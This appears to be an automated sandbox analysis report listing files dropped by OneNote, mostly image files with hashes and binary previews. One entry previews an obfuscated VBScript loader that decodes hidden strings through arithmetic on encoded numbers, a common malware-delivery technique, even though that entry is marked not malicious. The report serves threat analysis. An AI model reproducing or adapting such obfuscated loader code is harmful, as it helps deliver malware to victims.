                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):34299
                                                                                                        Entropy (8bit):7.247541176493898
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                        MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                        SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                        SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                        SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55113
                                                                                                        Entropy (8bit):5.216959514455489
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                        MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                        SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                        SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                        SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                        Malicious:false
                                                                                                        Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32656
                                                                                                        Entropy (8bit):3.9517299510231485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                        MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                        SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                        SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                        SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                        Malicious:false
                                                                                                        Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15740
                                                                                                        Entropy (8bit):6.0674556182683945
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                        MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                        SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                        SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                        SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
